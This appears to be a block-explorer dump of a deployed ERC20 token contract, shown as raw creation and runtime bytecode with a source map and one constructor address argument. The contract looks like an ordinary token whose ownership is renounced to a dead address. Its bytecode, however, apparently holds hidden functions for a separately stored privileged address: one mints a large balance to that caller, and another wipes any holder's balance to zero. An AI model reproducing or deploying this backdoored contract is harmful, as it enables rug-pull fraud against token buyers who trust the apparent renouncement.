652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061181c602583611111565b9150611827826117c0565b604082019050919050565b6000602082019050818103600083015261184b8161180f565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118ae602483611111565b91506118b982611852565b604082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611940602283611111565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b60006119ac601b83611111565b91506119b782611976565b602082019050919050565b600060208201905081810360008301526119db8161199f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611a3e602583611111565b9150611a49826119e2565b604082019050919050565b60006020820190508181036000830152611a6d81611a31565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ad0602383611111565b9150611adb82611a74565b604082019050919050565b60006020820190508181036000830152611aff81611ac3565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b62602683611111565b9150611b6d82611b06565b604082019050919050565b60006020820190508181036000830152611b9181611b55565b905091905056fea26469706673582212200f4c02e90dd0d53bf49f4aedea5be76a2e186974b7490181da02894f8ba1c83764736f6c63430008130033000000000000000000000000a4a397dbaec2065676d47a8ff364e2555a783c9c

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063570d00ed116100a257806395d89b411161007157806395d89b41146102a8578063a457c2d7146102c6578063a9059cbb146102f6578063dd62ed3e14610326578063fb86a404146103565761010b565b8063570d00ed1461023457806370a0823114610250578063880ad0af146102805780638da5cb5b1461028a5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e65780634a8d1348146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806309f14a5c1461015e57806318160ddd1461017a575b600080fd5b610118610374565b6040516101259190611196565b60405180910390f35b61014860048036038101906101439190611251565b610406565b60405161015591906112ac565b60405180910390f35b610178600480360381019061017391906112c7565b610424565b005b6101826105bc565b60405161018f9190611303565b60405180910390f35b6101b260048036038101906101ad919061131e565b6105c6565b6040516101bf91906112ac565b60405180910390f35b6101d06106be565b6040516101dd919061138d565b60405180910390f35b61020060048036038101906101fb9190611251565b6106c7565b60405161020d91906112ac565b60405180910390f35b61021e610773565b60405161022b91906113b7565b60405180910390f35b61024e600480360381019061024991906113d2565b61079d565b005b61026a600480360381019061026591906113d2565b610896565b6040516102779190611303565b60405180910390f35b6102886108df565b005b610292610a1b565b60405161029f91906113b7565b60405180910390f35b6102b0610a44565b6040516102bd9190611196565b60405180910390f35b6102e060048036038101906102db9190611251565b610ad6565b6040516102ed91906112ac565b60405180910390f35b610310600480360381019061030b9190611251565b610bc1565b60405161031d91906112ac565b60405180910390f35b610340600480360381019061033b91906113ff565b610bdf565b60405161034d9190611303565b60405180910390f35b61035e610c66565b60405161036b9190611303565b60405180910390f35b6060600480546103839061146e565b80601f01602080910402602001604051908101604052809291908181526020018280546103af9061146e565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610c86565b8484610c8e565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036105b85760006012600a6104899190611601565b631dcd6500610498919061164c565b90506000612710826104aa919061164c565b905060006001806001806001866104c1919061164c565b6104cb919061164c565b6104d5919061164c565b6104df919061164c565b6104e9919061164c565b905083816104f7919061164c565b90508060016000610506610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461054f919061168e565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105b057600080fd5b5050506105b9565b5b50565b6000600354905090565b60006105d3848484610e57565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061061e610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561069e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069590611734565b60405180910390fd5b6106b2856106aa610c86565b858403610c8e565b60019150509392505050565b60006012905090565b60006107696106d4610c86565b8484600260006106e2610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610764919061168e565b610c8e565b6001905092915050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561084857508073ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b15610893576000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108e7610c86565b73ffffffffffffffffffffffffffffffffffffffff16610905610a1b565b73ffffffffffffffffffffffffffffffffffffffff161461095b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610952906117a0565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610a539061146e565b80601f0160208091040260200160405190810160405280929190818152602001828054610a7f9061146e565b8015610acc5780601f10610aa157610100808354040283529160200191610acc565b820191906000526020600020905b815481529060010190602001808311610aaf57829003601f168201915b5050505050905090565b60008060026000610ae5610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9990611832565b60405180910390fd5b610bb6610bad610c86565b85858403610c8e565b600191505092915050565b6000610bd5610bce610c86565b8484610e57565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610c749190611601565b633b9aca00610c83919061164c565b81565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf4906118c4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d6c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6390611956565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e4a9190611303565b60405180910390a3505050565b60008111610e9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e91906119c2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0090611a54565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6f90611ae6565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff690611b78565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611094919061168e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110f89190611303565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611140578082015181840152602081019050611125565b60008484015250505050565b6000601f19601f8301169050919050565b600061116882611106565b6111728185611111565b9350611182818560208601611122565b61118b8161114c565b840191505092915050565b600060208201905081810360008301526111b0818461115d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111e8826111bd565b9050919050565b6111f8816111dd565b811461120357600080fd5b50565b600081359050611215816111ef565b92915050565b6000819050919050565b61122e8161121b565b811461123957600080fd5b50565b60008135905061124b81611225565b92915050565b60008060408385031215611268576112676111b8565b5b600061127685828601611206565b92505060206112878582860161123c565b9150509250929050565b60008115159050919050565b6112a681611291565b82525050565b60006020820190506112c1600083018461129d565b92915050565b6000602082840312156112dd576112dc6111b8565b5b60006112eb8482850161123c565b91505092915050565b6112fd8161121b565b82525050565b600060208201905061131860008301846112f4565b92915050565b600080600060608486031215611337576113366111b8565b5b600061134586828701611206565b935050602061135686828701611206565b92505060406113678682870161123c565b9150509250925092565b600060ff82169050919050565b61138781611371565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816111dd565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000602082840312156113e8576113e76111b8565b5b60006113f684828501611206565b91505092915050565b60008060408385031215611416576114156111b8565b5b600061142485828601611206565b925050602061143585828601611206565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061148657607f821691505b6020821081036114995761149861143f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115611525578086048111156115015761150061149f565b5b60018516156115105780820291505b808102905061151e856114ce565b94506114e5565b94509492505050565b60008261153e57600190506115fa565b8161154c57600090506115fa565b8160018114611562576002811461156c5761159b565b60019150506115fa565b60ff84111561157e5761157d61149f565b5b8360020a9150848211156115955761159461149f565b5b506115fa565b5060208310610133831016604e8410600b84101617156115d05782820a9050838111156115cb576115ca61149f565b5b6115fa565b6115dd84848460016114db565b925090508184048111156115f4576115f361149f565b5b81810290505b9392505050565b600061160c8261121b565b915061161783611371565b92506116447fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848461152e565b905092915050565b60006116578261121b565b91506116628361121b565b92508282026116708161121b565b915082820484148315176116875761168661149f565b5b5092915050565b60006116998261121b565b91506116a48361121b565b92508282019050808211156116bc576116bb61149f565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061171e602883611111565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061178a602083611111565b915061179582611754565b602082019050919050565b600060208201905081810360008301526117b98161177d565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061181c602583611111565b9150611827826117c0565b604082019050919050565b6000602082019050818103600083015261184b8161180f565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118ae602483611111565b91506118b982611852565b604082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611940602283611111565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b60006119ac601b83611111565b91506119b782611976565b602082019050919050565b600060208201905081810360008301526119db8161199f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611a3e602583611111565b9150611a49826119e2565b604082019050919050565b60006020820190508181036000830152611a6d81611a31565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ad0602383611111565b9150611adb82611a74565b604082019050919050565b60006020820190508181036000830152611aff81611ac3565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b62602683611111565b9150611b6d82611b06565b604082019050919050565b60006020820190508181036000830152611b9181611b55565b905091905056fea26469706673582212200f4c02e90dd0d53bf49f4aedea5be76a2e186974b7490181da02894f8ba1c83764736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000a4a397dbaec2065676d47a8ff364e2555a783c9c

-----Decoded View---------------
Arg [0] : ads (address): 0xa4A397dbAeC2065676D47a8fF364E2555a783c9c

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000a4a397dbaec2065676d47a8ff364e2555a783c9c


Deployed Bytecode Sourcemap

6493:8407:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7979:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10372:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7181:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8642:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10896:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8430:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11772:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7085:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7709:163;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8940:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5490:267;;;:::i;:::-;;5838:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8192:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12329:460;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9377:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9879:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6854:67;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7979:100;8033:13;8066:5;8059:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7979:100;:::o;10372:184::-;10475:4;10492:34;10501:12;:10;:12::i;:::-;10515:2;10519:6;10492:8;:34::i;:::-;10544:4;10537:11;;10372:184;;;;:::o;7181:401::-;7255:10;7238:27;;:13;;;;;;;;;;;:27;;;7234:341;;7282:12;6845:2;7309;:15;;;;:::i;:::-;7297:9;:27;;;;:::i;:::-;7282:42;;7339:15;7364:5;7357:4;:12;;;;:::i;:::-;7339:30;;7384:9;7422:1;7418;7414;7410;7406;7396:7;:11;;;;:::i;:::-;:15;;;;:::i;:::-;:19;;;;:::i;:::-;:23;;;;:::i;:::-;:27;;;;:::i;:::-;7384:39;;7452:6;7445:4;:13;;;;:::i;:::-;7438:20;;7500:4;7473:9;:23;7483:12;:10;:12::i;:::-;7473:23;;;;;;;;;;;;;;;;:31;;;;;;;:::i;:::-;;;;;;;;7544:10;7527:27;;:13;;;;;;;;;;;:27;;;7519:36;;;;;;7267:300;;;7234:341;;;;7181:401;:::o;8642:108::-;8703:7;8730:12;;8723:19;;8642:108;:::o;10896:529::-;11036:4;11053:36;11063:6;11071:9;11082:6;11053:9;:36::i;:::-;11102:24;11129:11;:19;11141:6;11129:19;;;;;;;;;;;;;;;:33;11149:12;:10;:12::i;:::-;11129:33;;;;;;;;;;;;;;;;11102:60;;11215:6;11195:16;:26;;11173:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;11325:57;11334:6;11342:12;:10;:12::i;:::-;11375:6;11356:16;:25;11325:8;:57::i;:::-;11413:4;11406:11;;;10896:529;;;;;:::o;8430:100::-;8488:5;6845:2;8506:16;;8430:100;:::o;11772:225::-;11880:4;11897:70;11906:12;:10;:12::i;:::-;11920:2;11956:10;11924:11;:25;11936:12;:10;:12::i;:::-;11924:25;;;;;;;;;;;;;;;:29;11950:2;11924:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;11897:8;:70::i;:::-;11985:4;11978:11;;11772:225;;;;:::o;7085:88::-;7125:7;7152:13;;;;;;;;;;;7145:20;;7085:88;:::o;7709:163::-;7782:10;7765:27;;:13;;;;;;;;;;;:27;;;:52;;;;;7813:4;7796:21;;:13;;;;;;;;;;;:21;;;;7765:52;7761:104;;;7852:1;7834:9;:15;7844:4;7834:15;;;;;;;;;;;;;;;:19;;;;7761:104;7709:163;:::o;8940:143::-;9030:7;9057:9;:18;9067:7;9057:18;;;;;;;;;;;;;;;;9050:25;;8940:143;;;:::o;5490:267::-;5075:12;:10;:12::i;:::-;5064:23;;:7;:5;:7::i;:::-;:23;;;5056:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5624:42:::1;5560:118;;5595:6;::::0;::::1;;;;;;;;5560:118;;;;;;;;;;;;5706:42;5689:6;::::0;:60:::1;;;;;;;;;;;;;;;;;;5490:267::o:0;5838:87::-;5884:7;5911:6;;;;;;;;;;;5904:13;;5838:87;:::o;8192:104::-;8248:13;8281:7;8274:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8192:104;:::o;12329:460::-;12442:4;12459:24;12486:11;:25;12498:12;:10;:12::i;:::-;12486:25;;;;;;;;;;;;;;;:29;12512:2;12486:29;;;;;;;;;;;;;;;;12459:56;;12568:15;12548:16;:35;;12526:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;12684:62;12693:12;:10;:12::i;:::-;12707:2;12730:15;12711:16;:34;12684:8;:62::i;:::-;12777:4;12770:11;;;12329:460;;;;:::o;9377:200::-;9488:4;9505:42;9515:12;:10;:12::i;:::-;9529:9;9540:6;9505:9;:42::i;:::-;9565:4;9558:11;;9377:200;;;;:::o;9879:164::-;9987:7;10014:11;:17;10026:4;10014:17;;;;;;;;;;;;;;;:21;10032:2;10014:21;;;;;;;;;;;;;;;;10007:28;;9879:164;;;;:::o;6854:67::-;6845:2;6905;:15;;;;:::i;:::-;6888:13;:33;;;;:::i;:::-;6854:67;:::o;3854:98::-;3907:7;3934:10;3927:17;;3854:98;:::o;14541:356::-;14687:1;14671:18;;:4;:18;;;14663:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14763:1;14749:16;;:2;:16;;;14741:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;14841:6;14817:11;:17;14829:4;14817:17;;;;;;;;;;;;;;;:21;14835:2;14817:21;;;;;;;;;;;;;;;:30;;;;14878:2;14863:26;;14872:4;14863:26;;;14882:6;14863:26;;;;;;:::i;:::-;;;;;;;;14541:356;;;:::o;13059:712::-;13208:1;13199:6;:10;13191:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;13278:1;13260:20;;:6;:20;;;13252:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;13362:1;13341:23;;:9;:23;;;13333:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;13417:21;13441:9;:17;13451:6;13441:17;;;;;;;;;;;;;;;;13417:41;;13508:6;13491:13;:23;;13469:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;13652:6;13636:13;:22;13616:9;:17;13626:6;13616:17;;;;;;;;;;;;;;;:42;;;;13704:6;13680:9;:20;13690:9;13680:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;13745:9;13728:35;;13737:6;13728:35;;;13756:6;13728:35;;;;;;:::i;:::-;;;;;;;;13180:591;13059:712;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:329::-;3505:6;3554:2;3542:9;3533:7;3529:23;3525:32;3522:119;;;3560:79;;:::i;:::-;3522:119;3680:1;3705:53;3750:7;3741:6;3730:9;3726:22;3705:53;:::i;:::-;3695:63;;3651:117;3446:329;;;;:::o;3781:118::-;3868:24;3886:5;3868:24;:::i;:::-;3863:3;3856:37;3781:118;;:::o;3905:222::-;3998:4;4036:2;4025:9;4021:18;4013:26;;4049:71;4117:1;4106:9;4102:17;4093:6;4049:71;:::i;:::-;3905:222;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:329::-;5599:6;5648:2;5636:9;5627:7;5623:23;5619:32;5616:119;;;5654:79;;:::i;:::-;5616:119;5774:1;5799:53;5844:7;5835:6;5824:9;5820:22;5799:53;:::i;:::-;5789:63;;5745:117;5540:329;;;;:::o;5875:474::-;5943:6;5951;6000:2;5988:9;5979:7;5975:23;5971:32;5968:119;;;6006:79;;:::i;:::-;5968:119;6126:1;6151:53;6196:7;6187:6;6176:9;6172:22;6151:53;:::i;:::-;6141:63;;6097:117;6253:2;6279:53;6324:7;6315:6;6304:9;6300:22;6279:53;:::i;:::-;6269:63;;6224:118;5875:474;;;;;:::o;6355:180::-;6403:77;6400:1;6393:88;6500:4;6497:1;6490:15;6524:4;6521:1;6514:15;6541:320;6585:6;6622:1;6616:4;6612:12;6602:22;;6669:1;6663:4;6659:12;6690:18;6680:81;;6746:4;6738:6;6734:17;6724:27;;6680:81;6808:2;6800:6;6797:14;6777:18;6774:38;6771:84;;6827:18;;:::i;:::-;6771:84;6592:269;6541:320;;;:::o;6867:180::-;6915:77;6912:1;6905:88;7012:4;7009:1;7002:15;7036:4;7033:1;7026:15;7053:102;7095:8;7142:5;7139:1;7135:13;7114:34;;7053:102;;;:::o;7161:848::-;7222:5;7229:4;7253:6;7244:15;;7277:5;7268:14;;7291:712;7312:1;7302:8;7299:15;7291:712;;;7407:4;7402:3;7398:14;7392:4;7389:24;7386:50;;;7416:18;;:::i;:::-;7386:50;7466:1;7456:8;7452:16;7449:451;;;7881:4;7874:5;7870:16;7861:25;;7449:451;7931:4;7925;7921:15;7913:23;;7961:32;7984:8;7961:32;:::i;:::-;7949:44;;7291:712;;;7161:848;;;;;;;:::o;8015:1073::-;8069:5;8260:8;8250:40;;8281:1;8272:10;;8283:5;;8250:40;8309:4;8299:36;;8326:1;8317:10;;8328:5;;8299:36;8395:4;8443:1;8438:27;;;;8479:1;8474:191;;;;8388:277;;8438:27;8456:1;8447:10;;8458:5;;;8474:191;8519:3;8509:8;8506:17;8503:43;;;8526:18;;:::i;:::-;8503:43;8575:8;8572:1;8568:16;8559:25;;8610:3;8603:5;8600:14;8597:40;;;8617:18;;:::i;:::-;8597:40;8650:5;;;8388:277;;8774:2;8764:8;8761:16;8755:3;8749:4;8746:13;8742:36;8724:2;8714:8;8711:16;8706:2;8700:4;8697:12;8693:35;8677:111;8674:246;;;8830:8;8824:4;8820:19;8811:28;;8865:3;8858:5;8855:14;8852:40;;;8872:18;;:::i;:::-;8852:40;8905:5;;8674:246;8945:42;8983:3;8973:8;8967:4;8964:1;8945:42;:::i;:::-;8930:57;;;;9019:4;9014:3;9010:14;9003:5;9000:25;8997:51;;;9028:18;;:::i;:::-;8997:51;9077:4;9070:5;9066:16;9057:25;;8015:1073;;;;;;:::o;9094:281::-;9152:5;9176:23;9194:4;9176:23;:::i;:::-;9168:31;;9220:25;9236:8;9220:25;:::i;:::-;9208:37;;9264:104;9301:66;9291:8;9285:4;9264:104;:::i;:::-;9255:113;;9094:281;;;;:::o;9381:410::-;9421:7;9444:20;9462:1;9444:20;:::i;:::-;9439:25;;9478:20;9496:1;9478:20;:::i;:::-;9473:25;;9533:1;9530;9526:9;9555:30;9573:11;9555:30;:::i;:::-;9544:41;;9734:1;9725:7;9721:15;9718:1;9715:22;9695:1;9688:9;9668:83;9645:139;;9764:18;;:::i;:::-;9645:139;9429:362;9381:410;;;;:::o;9797:191::-;9837:3;9856:20;9874:1;9856:20;:::i;:::-;9851:25;;9890:20;9908:1;9890:20;:::i;:::-